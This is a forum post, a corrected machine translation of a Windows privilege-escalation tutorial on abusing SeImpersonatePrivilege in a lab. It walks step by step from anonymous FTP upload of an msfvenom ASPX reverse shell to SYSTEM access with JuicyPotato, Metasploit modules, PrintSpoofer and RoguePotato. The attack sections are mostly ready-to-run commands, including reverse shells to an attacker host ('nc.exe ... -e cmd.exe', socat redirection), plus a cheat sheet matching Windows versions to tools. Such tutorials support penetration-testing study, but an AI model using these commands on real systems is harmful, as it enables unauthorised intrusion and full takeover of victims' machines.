IT评测·应用市场-qidao123.com技术社区

标题: Windows 提权-SeImpersonatePrivilege 特权 [打印本页]

作者: 鼠扑 时间: 2025-2-26 19:13
标题: Windows 提权-SeImpersonatePrivilege 特权

本文通过 Google 翻译 SeImpersonatePrivilege – Windows Privilege Escalation 这篇文章所产生，本人仅是对机器翻译中部门表达别扭的字词进行了校正及个别注释补充。

导航

0、前言

在这篇文章中，我们将探讨三种能够用来滥用 SeImpersonate 特权的技能。起首，我们将回顾这样一个场景：在利用配置有误的 FTP 服务器后，我们能以 iisapppool 服务账号在 Windows 10 机器上站稳脚跟。接着，我们会枚举这个账号的权限，发现它已启用 SeImpersonatePrivilege 特权，然后我们会借助 JuicyPotato.exe 实行 Potato 攻击，把我们的权限提拔到本地 SYSTEM 级别。【同时，也会利用 Metasploit 里的 JuicyPotato 模块来主动化这种攻击利用。】
末了，我们也来看看怎样通过别的两款工具 RoguePotato 和 PrintSpoofer 去滥用 SeImpersonate 特权，从而在 Server 2019 的机器上获取到 SYSTEM 权限。
默认情况下，本地管理员组的成员以及任何本地服务帐户都将被授予“身份验证后模拟客户端”用户权利，即 SeimpersonatePrivilege 特权。

授权位置：本地安全策略(secpol.msc)-本地策略-用户权限分配-身份验证后模拟客户端。】

一个已启用 SeImpersonate 特权的账户在完成身份验证后，就能够模拟别的也已通过身份验证的账户，如账户A。如果被模拟的账户A 没有完成身份验证，那么体系中（LSASS 进程里的登录会话）便不会存留它的令牌信息，此时便不能够满足 SeImpersonate 特权模拟账户身份的条件，此时模拟账户身份的动作也会失败，体系也会拒绝模拟请求。

账户登录或通过身份验证之后，体系便会为其生成一个身份验证令牌，该令牌会一直存在，直到体系重启。

了解了这种特权能让我们做什么之后，作为攻击者，我们得思考：“当 SeImperonsate 特权启用时，要冒充管理员账户还需要哪些条件？”
让我们找出答案！
1、获得驻足点

为了给这篇文章补充些背景信息，我们会拿一个有关配置有误的 FTP 服务器作为示例场景。我们要借助这种错误配置来构建一个利用链，从而能从 Web 服务器获取反向 shell ，这样一来，就能以内置的 IIS 服务账户：iisapppool 作为驻足点。
运行以下 nmap 扫描，我们可以观察到 FTP 在端口 21 上打开并且允许匿名访问、端口 80 上有一个 IIS Web 服务器。

nmap -A -sV -sC -T4 172.16.1.50 -p- -oN tcp.nmap

复制代码

检察这个 nmap 扫描结果，我们发现 FTP 服务器里的文件貌似属于 Web 服务器，这表明 FTP 服务器很大概运行在 Web 服务的根目录上！
这时，我们应该做的第一件事就是尝试匿名登录 FTP 服务器，并测试是否拥有文件上传权限。如果我们可以在 FTP 服务器中上传文件，那么我们很大概轻而易举就能获得反向 Shell。
在登录 FTP 服务器之前，我们先制作一个简单的 txt 文件。

echo 'testing for hax!' > test.txt

复制代码

现在已经准备好了，我们可以连接到 FTP 服务器并利用凭据 anonymous : anonymous 登录。【注：匿名用户的暗码可以是任何值或者直接回车。】

ftp 172.16.1.50

复制代码

乐成登录并建立会话后，我们可以利用 put 下令将我们的 test.txt 文件上传到 FTP 服务器上。

Awesome！我们能够将文件上传到 FTP 服务器，并且可以从浏览器访问到文件内容。

现在我们可以举措了！既然我们已经能够确认 FTP 服务器在 webroot 上运行，那我们就能够继续上传恶意文件，然后实行它，从而在这台主机上获取反向 shell。
鉴于我们正在面临的 IIS 10.0 是现代化版本，所以我们用于漏洞利用所需创建的文件类型选择 ASPX。

对于 IIS 的较旧版本（IIS 6之前的版本），我们将选择 ASP 类型的利用文件。

为了制作恶意的 ASPX 文件，我们将利用 msfvenom 工具进行。

从 nmap 扫描结果来看，目标运行着 IIS 10 ，被认定为 Windows 10 build 17134 。不过，这大概并非百分之百准确，但起码让我们知道了目标的大致情况；关键的是，这表明该体系较为现代，很大概是 x64 架构。鉴于此，我们起首制作基于 x64 位架构的恶意 ASPX 利用文件，要是不行，我们再测试 x32 位架构的恶意 ASPX 利用文件。

msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.16.1.30 LPORT=80 -a x64 --platform Windows -f aspx -o shell.aspx

复制代码

在这个示例中，我决定让反向 shell 利用 80 端口。您通常会看到我利用 443/80/445/21 端口，这是因为这些端口通常能够通过防火墙实现出站访问。倘若我们利用像“4444”这样的任意端口，则很大概会被防火墙阻拦，进而错误地认为漏洞利用没有结果。

利用文件现在已经准备就绪，接下来，我们只需要在端口 80 上启动 netcat 侦听器，然后返回我们的 FTP 会话，利用 put 下令将恶意 ASPX 文件上传到 Web 服务器。

接着，我们在浏览器访问该链接http://172.16.1.50/shell.aspx，或利用以下 curl 下令：

curl 172.16.1.50/shell.aspx

复制代码

在利用以上任意一种方法触发后，我们便得到了一个 iisapppool 用户身份的 shell。

1.1、枚举 SeimpersonatePrivilege 特权是否启用

在目标体系上获得驻足点之后，我们可以先做些手动枚举，以快速了解当前的情况。
起首在受害者主机上运行 whoami 下令以确定我们当前是什么用户，然后运行 whoami /priv 下令确定分配给该帐户的特权。

在这里，我们可以看到该帐户启用了 SeimpersonatePrivilege 特权，这是一个重大发现！
同时我们看到 SeAssignPrimaryTokenPrivilege 特权也被提及，该特权实在和 SeimpersonatePrivilege 特权的作用是一样的，只不过 SeimpersonatePrivilege 出现的更多一些，这两个特权出现其中任意一个都属于重大发现，它们的利用方式都是一样的。

服务账户和提拔账户默认都会同时拥有 SeImpersonatePrivilege 和 SeAssignPrimaryTokenPrivilge 这两项特权。需要指出的是，这两项特权均可实用下面所提到的三种攻击。但比起只有 SeAssignPrimaryTokenPrivilge 却没有 SeImpersonatePrivilege 的情况，没有 SeAssignPrimaryTokenPrivilge 但有 SeImpersonatePrivilege 的情况更为多见。而且，SeImpersonatePrivilege 是默认启用的，因此，在这两项特权中，我们通常会重点关注 SeImpersonatePrivilege 特权。

2、利用 JuicyPotato 模拟本地 SYSTEM 帐户

Potato 提权原理的过程如下：

诱使“NT AUTHORITY\SYSTEM”账户通过 NTLM 向我们掌控的 TCP 端点进行身份验证（向我们假冒的 RPC 服务器进行身份验证）。【假冒一个需要身份验证的 RPC 服务】
对此次身份验证尝试（NTLM 中继）实施中间人攻击，从而在本地为“NT AUTHORITY\SYSTEM”账户协商安全令牌。这是借助一系列 Windows API 调用（与 LSASS 进行交互）来实现的。【获得 SYSTEM 令牌】
鉴于该账户拥有 SeImpersonatePrivilege 特权，然后就可以模拟我们刚刚协商的 SYSTEM 令牌。【模拟 SYSTEM 令牌】

如果您对此攻击的工作原理细节感兴趣，可在此处检察更多。

受此漏洞影响的 Windows OS 包括：

Windows 7 Enterprise
Windows 8.1 Enterprise
Windows 10 Enterprise
Windows 10 Professional
Windows Server 2008 R2 Enterprise
Windows Server 2012 Datacenter
Windows Server 2016 Standard

重要：JuicyPotato 攻击在 Windows 10 version >=1809 时无效，在 Windows Server 2019 上也是无效的！
2.1、滥用 SeimpersonatePrivilege 特权：JuciyPotato.exe

当我们利用 JuicyPotato.exe 利用此漏洞时，它将为本地 SYSTEM 帐户创建一个安全令牌，然后模仿该令牌以实行我们指定的下令。

从此处可以获取 JuicyPotato.exe 的 64 位可实行文件，如果您需要 32 位的可实行文件，则可以在此处获取。

现在，既然我们拥有了 JuicyPotato 在两种架构下的可实行文件，接下来我们便需要确定受害者机器上运行的OS版本：

systeminfo | findstr /B /C:"Host Name" /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Hotfix(s)"

复制代码

从上面我们可以看到这是受害机器的 OS Version 是 Windows 10 Professional - Build 17134。（注意：“Build”和“Version”是两回事，不是一个概念。）如果我们在这里对照此图表，我们可以看到 Build 17134 对应的是 Version 1803。而自 Version 1803 到 Version 1809 以来，由于尚未对此进行修补，因此该主机应该是脆弱的。

现在，我们需要一个待会以 SYSTEM 身份实行的程序。有许多方法可以利用这一点，但在本例中，我们将利用 msfvenom 去制作一个 EXE 程序。

msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.16.1.30 LPORT=80 -a x64 --platform Windows -f exe -o shell.exe

复制代码

此时，我们的工作目录中已经有 JuicyPotato.exe 和 shell.exe 文件，然后利用文件传输技能将其发送到受害者机器上。

同时在攻击机上启动监听在 80 端口上的 netcat 侦听器，然后利用 juicypotato.exe 实行 shell.exe，比方：

注：JuicyPotato.exe 参数中的 -l 443 是指 COM 服务监听的端口，443可以是任意值。
下令中未出现的默认参数 -n 135 是 RPC 服务的端口，关于 RPC 服务和 COM 服务之间的关系目前还不太明确，有待研究。

C:\temp\JuicyPotato.exe -t * -p C:\temp\shell.exe -l 443

复制代码

要是我们发现这个进程乐成创建了，那在我们的侦听器上应该会返回一个 SYSTEM 权限的 shell。

2.2、JuicyPotato 故障处理

需要阐明的是，该漏洞并不总是能在利用默认 CLSID(大括号中的数字)时奏效。
偶然间，如果第一次没乐成，就把条下令多测试几次，然后就大概奏效了，如下图就是这种情况。

偶然间我们尝试了好多次还是不能够乐成，这时，还有一种更累的方法值得去试试，那就是将 CLSID 字串提供到下令中，因为默认的 CLSID 偶然大概无法正常工作。
我们可以在此链接检察到各种利用体系的潜伏 CLSID 字串。由于我们发现受害者机器是 Windows 10 Pro，因此我们可从前往对应的链接。

点击链接后，我们会看到一长串潜伏的 CLSID，我们可以对其进行测试，尝试让这个漏洞发挥作用。我们要重点关注 NT AUTHORITY\SYSTEM 用户的 CLSID。

就这个列表而言，我们并不想立刻采取自上而下的方式。我们想先找出 BITS CLSIDs 并对其进行测试，如果这些不起作用，那我们再采取自上而下的方式。
要测试不同的 CLSID，我们需要更改下令，以包含我们要测试的 CLSID。比方：

C:\temp\JuicyPotato.exe -t * -p C:\temp\shell.exe -l 443 -c "{6d18ad12-bde3-4393-b311-099c346e6df9}"

复制代码

请注意 CLSID 周围的双引号，下令需要这些引号，否则将无法实行。

2.3、滥用 SeimpersonatePrivilege 特权：Metasploit 模块

JuicyPotato 漏洞利用除了上述繁琐的手动方法外，还有一种更为方便的主动化方法可以利用。我们起首在攻击机上利用以下下令启动 Metasploit：

msfconsole -q

复制代码

启动后，我们可以设置一个 web 投递载荷以获取 meterpreter shell，这比利用 msfvenom 制作 meterpreter 载荷并将其发送给受害者要简单得多（省去了载荷制作和上传的步骤）。这种方法会提供一个 PowerShell 下令，我们可以直接将其复制并粘贴到受害者的 shell 中，运行该下令我们便能获得一个 meterpreter 会话。

use exploit/multi/script/web_delivery

复制代码

在此之前，我们还需要更改四个参数：PAYLOAD、LHOST、 LPORT、TARGET。

set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 172.16.1.30
set LPORT 80
set TARGET 2

复制代码

之后通过 show options 检察参数信息：

现在，我们开始进行利用。

将输出的 powershell 下令粘贴到受害者 shell 并实行后，我们将看到一个MeterPreter 会话产生。

现在，我们便能够通过下令“sessions -i 1”进入 meterpreter shell。同时，我们还需将 meterpreter 的会话编号记下来，以便在后面的 JuicyPotato 模块选项中可以继续利用。

在 MeterPreter 会话中，下令 getprivs 可以帮助我们检察当前账户的特权信息，和在cmd.exe 中的 whoami /priv 下令是一样的结果。

在 Metasploit 中有两个 Potato 攻击模块，可以利用以下下令找到：

search ms16_075

复制代码

在此示例中我们利用第二个，因为它的 Rank 级别是 great。第一个实际上是 rotterpotato，它是一种较旧服从较低的 Potato 版本。

use exploit/windows/local/ms16_075_reflection_juicy

复制代码

同样，要编辑的选项有：PAYLOAD、SESSION、LHOST、LPORT。此外，如果在利用过程中利用默认的 CLSID 失败，那我们可以按照在手动方式中查到的 CLSID 列表逐一尝试，直到它起作用为止。

set PAYLOAD windows/x64/meterpreter/reverse_tcp
set SESSION 1
set LHOST 172.16.1.30
set LPORT 443

复制代码

运行 show options 检察参数信息：

这一次，当我们再次实行 exploit 时，它便会进行 Potato 攻击，与此同时第二个 meterpreter 会话便会产生，而这就是我们的特权会话！

3、利用 PrintSpoofer 模拟本地 SYSTEM 帐户

不幸的是，在 Windows Server 2019 发布时，微软同时也对 Windows 10 利用体系做出了一些核心改动。结果，从 1809 版本开始的 Windows 10 利用体系便不能再通过 JuicyPotato 来加以利用了。

注：Windows Server 各版本的发布与相应的 Windows 客户端版本是相互关联的。每一代 Windows Server 版本通常是基于某个特定的 Windows 客户端版本进行开发的，虽然它们在功能上有所不同，但底层架构和技能大体同等。以下是 Server 各版本与客户端版本的对应：

Windows Server 2003 基于 Windows XP

Windows Server 2008 基于 Windows Vista

Windows Server 2008 R2 基于 Windows 7

Windows Server 2012 基于 Windows 8

Windows Server 2012 R2 基于 Windows 8.1

Windows Server 2016 基于 Windows 10（1607 版本）

Windows Server 2019 基于 Windows 10（1809 版本）

Windows Server 2022 基于 Windows 10（21H1 版本）

微软实施的变更会对攻击者假冒的服务需要建立 COM 连接的能力产生影响，因为现在连接仅被允许在 TCP 端口 135 上进行。这意味着攻击者无法再以 SYSTEM 身份对其假冒的 RPC 服务进行认证来创建可被模拟的令牌，从而让 JuicyPotato 失效。
但幸运的是，由于 JuicyPotato 的失效，一个名叫 itm4n 的聪明人开始研究，并发现了 PrintSpoofer 这个漏洞。
PrintSpoofer 的工作原理与传统的 Potato 攻击不同，它实际上是利用一种古老的技能，将定名管道与 Print Spooler服务结合起来来对体系进行攻击利用。
由于此漏洞利用所采取的技能与常见的 Potato 攻击手段完全不同，由此带来的另一个惊喜是，该漏洞利用实际上实用于 Server 2016 和 Server 2019 的全部版本，以及 Windows 10 至少从 1607 版开始的每个版本。

Windows Server 2016 从版本 1607 开始

如果想全面了解该漏洞的工作原理，可在此处检察干系介绍。

3.1、滥用 SeimpersonatePrivilege 特权：PrintSpoofer.exe

鉴戒上面我们用来获得驻足点的场景（FTP 服务器 + Web 服务器联结漏洞），看看当我们以 iisapppool 的身份获得 shell 时会发生什么，只不过这次的目标运行的是 Windows Server 2019。

systeminfo | findstr /B /C:"Host Name" /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Hotfix(s)"

复制代码

检查利用体系的版本，我们发现这是一台 Server2019 的机器，这意味着 JuicyPotato 在这里无法利用。
幸运的是，我们可以利用 PrintSpoofer.exe 将权限直接提拔到 SYSTEM。最重要的是，这个漏洞能让我们直接进入当前 shell 中的 SYSTEM shell。这意味着不再需要以 SYSTEM 身份实行恶意文件，只需要 PrintSpoofer.exe 就可以了。

从此处检察 printspoofer.exe 的64位和32位版本的副本。

将漏洞利用下载到受害者机器上后，我们可以实行以下下令直接进入 SYSTEM shell：

.\PrintSpoofer64.exe -i -c cmd

复制代码

3.2、PrintSpoofer 故障处理

有几次，当我满怀信心地认为这个漏洞应该起作用时，它却并不起作用。每当我运行这个漏洞时，它就会变成这样：

在下令实行之后，什么都不会发生。
尝试在实验室机器上通过图形用户界面运行漏洞利用程序后，发现 VCRUNTIME140.dll 丢失，而该程序是与 Visual Studio 打包在一起的。

由于我们无法从反向 shell 中看到此弹窗，因此我们可以利用以下下令检查它是否存在于体系上：

dir C:\Windows\System32 | findstr -i "vcruntime140.dll"

复制代码

如果无输出，那么我们知道这就是 printspoofer 失败的缘故原由。

我们该如何办理这个题目？- 我不建议从互联网上下载这个 DLL，因为据我所知，你无法直接从微软下载它。相反，如果你还没有将 Visual Studio 下载到实验室机器上，那就先下载到实验室机器上，然后再将 DLL 复制到你的攻击机器上。

将 vcruntime140.dll 的副本传输到我们的攻击者机器后，我们可以将其下载到受害者机器上。
由于以 iisapppool 的身份无权限将文件移至 C:\Windows\System32的位置，但我们可以将 DLL 放置在与利用程序的同一文件夹下进利用用。

4、利用 RoguePotato 模拟本地 SYSTEM 帐户

OXID 解析器是 "rpcss" 服务的一部门，运行在端口 135 上，由于对该解析器所做的更改，Windows 10 和 Windows Server 2019 从版本 1809 开始不再能够通过端口 135 以外的端口查询 OXID 解析器。这是 Juicy Potato 运行的关键部门。
此外，如果我们指定了长途 OXID 解析器，请求将以 ANONYMOUS LOGON 身份而非 SYSTEM 身份处理。因此，纵然我们找到了绕过 OXID 解析器题目标方法，当我们连接到欺骗服务时，仍旧会产生一个非特权 shell。
办理方法：我们可以从攻击者的机器上欺骗本地 OXID 解析器，这样连接就会重定向到我们这里，而不会显示为长途连接。然后，只要我们指定欺骗的服务器在 135 端口运行，就能有效绕过 "保护"，像利用 JuicyPotato 时那样乐成验证为 SYSTEM。
值得庆幸的是，由于针对查找 PrintSpoofer 漏洞利用所开展的研究，这一技能与最初 Potato 攻击的技能相融合，于是 Potato 家族的最新成员诞生了：RoguePoto

要充分了解 RoguePoto 的工作原理，请检察此处。

RoguePotato 采取了与原始 Potato 攻击类似的技能，但对攻击方式进行了修改，以适应从 1809 版本开始对 Windows 10/Server 2019 利用体系进行的更新。因此，根据我个人的经验，这个漏洞只实用于发生变化后的 Windows 版本（1809+）。
4.1、滥用 SeimpersonatePrivilege 特权：RoguePotato.exe

在本示例中，我们将在 Windows Server 2019 机器上继续从上一个示例中的初始驻足点开始。
要滥用 RoguePotato，起首，我们需要在攻击者机器上设置一个欺骗的 OXID 解析器来重定向请求。这可以利用以下 socat 下令来完成：

socat tcp-listen:135,reuseaddr,fork tcp:172.16.1.10:9999

复制代码

请注意，上述下令中的 IP 地点是受害者机器的 IP。

我们需要获取 roguepotato.exe 的副本，然后将其发送给受害者，然后开始利用此漏洞。

可以在此处找到 roguepotato.exe 的副本。

由于其工作原理与 JuicyPotato 相似，都是需要以 SYSTEM 的身份去实行某些利用。在本例中，我们不再像利用 JuicyPotato 时那样再次弹出恶意 shell.exe 文件，而是通过 netcat 去利用这一漏洞而获得反向 shell。

与此同时，我们还需要在攻击者机器上启动一个 netcat 侦听器以捕获 SYSTEM shell。然后就可以通过以下下令实行利用：

.\RoguePotato.exe -r 172.16.1.30 -e "C:\temp\nc.exe 172.16.1.30 443 -e cmd.exe" -l 9999

复制代码

注意：上面下令中的 IP 是攻击机的 IP，-l 9999 是本地 RogueOxidResolver 解析服务，对应上述 socat 下令中连接端口。

回到 netcat 侦听器之后，我们发现获得了一个 SYSTEM shell。

4.2、RoguePotato 故障处理

与利用 JuicyPotato 时一样，我们可以设置利用哪个 CLSID，而不是利用默认值。如果默认 CLSID 不起作用，我们可以参考上文 JuicyPotato 部门的列表，指定要利用的 CLSID。对于 RoguePotato，无论我们利用的是 Server 2019 还是 Windows 10 victim，都可以利用 Windows 10 Pro 列表中的 CLSID。
为了测试指定的 CLSID，我们可以利用 -c 选项，比方：

.\RoguePotato.exe -r 172.16.1.30 -e "C:\temp\nc.exe 172.16.1.30 443 -e cmd.exe" -l 9999 -c "{6d18ad12-bde3-4393-b311-099c346e6df9}"

复制代码

5、末了的想法

走到这里可真漫长啊！不过，我们介绍了许多出色的工具和技能。这些攻击从本质上来说颇具技能性，但它们极为强盛且易于利用。我建议阅读上述每个技能对应的链接中的干系文章，以便更清楚地了解这种攻击的工作原理。我只是简略地解释了一番，以便在展示实际攻击之前能有个大致的了解。
让我们快速回顾一下：

当您在 Windows 10 目标上获得驻足点时，请利用下令 whoami /priv 查询 SeimpersonatePrivilege 特权是否启用。【默认情况下，Windows 服务帐户都是启用的。】
利用 systemInfo 下令检察 Windows 版本。【然后对应下面的版本利用相应的利用程序。】
- Windows 7 – Windows 10 / Server 2016 version 1803 –> JuicyPotato
- Windows 10 / Server 2016 version 1607 – Windows 10 / Server 2019 present –> PrintSpoofer
- Windows 10 / Server 2019 version 1809 – present –> RoguePotato
注意：上面的 present (至今)是作者写这篇文章的时间，即 2022年6月，现在是否还有结果需要实验测试。

除了提权之外，SeImpersonatePrivlege 在黑客入侵 Active Directory 情况时的横向移动中亦发挥着重要作用。

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。

欢迎光临 IT评测·应用市场-qidao123.com技术社区 (https://dis.qidao123.com/)